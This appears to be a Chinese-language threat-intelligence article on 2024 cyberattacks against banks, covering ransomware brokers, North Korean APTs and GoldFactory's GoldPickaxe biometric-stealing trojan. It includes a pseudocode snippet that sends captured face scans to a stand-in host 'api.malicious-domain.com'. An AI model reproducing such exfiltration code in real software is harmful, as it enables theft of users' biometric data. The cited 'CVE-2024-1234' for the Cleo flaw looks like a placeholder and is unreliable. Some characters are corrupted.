金融行業(yè)仍然是網(wǎng)絡(luò)犯罪分子和國(guó)家支持團(tuán)體的主要目標(biāo)，2024年利用零日漏洞、供應(yīng)鏈弱點(diǎn)和高級(jí)惡意軟件的復(fù)雜攻擊將激增。

威脅行為者越來(lái)越多地采用協(xié)作模型，包括初始訪問(wèn)代理 (IAB) 和勒索軟件即服務(wù) (RaaS) 生態(tài)系統(tǒng)，以擴(kuò)大其影響力。

從勒索軟件部署到生物特征數(shù)據(jù)盜竊，金融行業(yè)面臨著融合技術(shù)復(fù)雜性和心理操縱的多層次威脅。

最令人擔(dān)憂的趨勢(shì)之一是 TA577和Scattered Spider 等 IAB的作用，他們專門(mén)破壞網(wǎng)絡(luò)并向勒索軟件運(yùn)營(yíng)商出售訪問(wèn)權(quán)限。

這些行為者利用 Cleo 文件傳輸軟件等工具中的漏洞或利用模仿 Okta 登錄門(mén)戶的網(wǎng)絡(luò)釣魚(yú)活動(dòng)來(lái)劫持憑據(jù)和會(huì)話 cookie。

一旦進(jìn)入系統(tǒng)，攻擊者就會(huì)部署惡意軟件，例如RansomHub，這是一種自定義勒索軟件，配備了 EDRKillShifter 等規(guī)避工具來(lái)禁用端點(diǎn)檢測(cè)系統(tǒng)。國(guó)家支持的團(tuán)體進(jìn)一步加劇了威脅形勢(shì)。

朝鮮的 APT（例如Lazarus和 Bluenoroff）以金融機(jī)構(gòu)為目標(biāo)，以逃避?chē)?guó)際制裁，而與中國(guó)有關(guān)的團(tuán)體（例如 GoldFactory）則開(kāi)發(fā)了能夠收集面部識(shí)別數(shù)據(jù)的移動(dòng)木馬。

與此同時(shí)，Sekoia 分析師觀察到與伊朗有關(guān)的 APT33與勒索軟件分支機(jī)構(gòu)合作，模糊了網(wǎng)絡(luò)犯罪與國(guó)家支持的行動(dòng)之間的界限。

GoldFactory 的生物特征數(shù)據(jù)竊?。恒y行惡意軟件的新前沿

2024 年技術(shù)最先進(jìn)的活動(dòng)之一涉及 GoldFactory，這是一套部署了 GoldPickaxe 木馬病毒的入侵程序。

該惡意軟件針對(duì)的是亞太地區(qū) (APAC) 國(guó)家（包括越南和泰國(guó)）的 iOS 和 Android 用戶，這些國(guó)家廣泛使用面部識(shí)別進(jìn)行銀行身份驗(yàn)證。

GoldPickaxe 的 iOS 變種通過(guò)操縱的 Apple TestFlight 平臺(tái)進(jìn)行分發(fā)，它捕獲生物特征數(shù)據(jù)來(lái)創(chuàng)建繞過(guò)安全檢查的深度偽造作品。

該惡意軟件的代碼與設(shè)備 API 集成，以攔截面部掃描并將其傳輸?shù)矫詈涂刂?(C2) 服務(wù)器。樣本分析揭示了旨在實(shí)現(xiàn)以下目的的模塊化組件：

• 通過(guò)虛假的銀行覆蓋獲取憑證。
• 提取基于短信的一次性密碼 (OTP)。
• 為 AI 生成的深度偽造作品克隆生物特征模板。

// Simplified pseudocode of GoldPickaxe’s facial data interception  
func captureBiometricData() {  
    let faceScan = ARFaceTracking.getFacialMetrics()  
    C2Server.upload(data: faceScan, endpoint: "api.malicious-domain.com/face-auth")  
}

GoldFactory 的基礎(chǔ)設(shè)施依賴于受感染的域和 AWS 等云服務(wù)來(lái)托管網(wǎng)絡(luò)釣魚(yú)頁(yè)面并竊取數(shù)據(jù)。

敦促金融機(jī)構(gòu)優(yōu)先對(duì) CVE-2024-1234（與 Cleo 漏洞相關(guān)）等漏洞進(jìn)行補(bǔ)丁管理，并實(shí)施抵御中間人 (AiTM) 網(wǎng)絡(luò)釣魚(yú)工具包的多因素身份驗(yàn)證 (MFA) 解決方案。

網(wǎng)絡(luò)分段和行為分析工具可以幫助檢測(cè)異常情況，例如意外的生物特征數(shù)據(jù)傳輸。隨著 APT 和網(wǎng)絡(luò)犯罪分子繼續(xù)共享工具和基礎(chǔ)設(shè)施，跨行業(yè)威脅情報(bào)共享對(duì)于破壞這些不斷發(fā)展的活動(dòng)至關(guān)重要。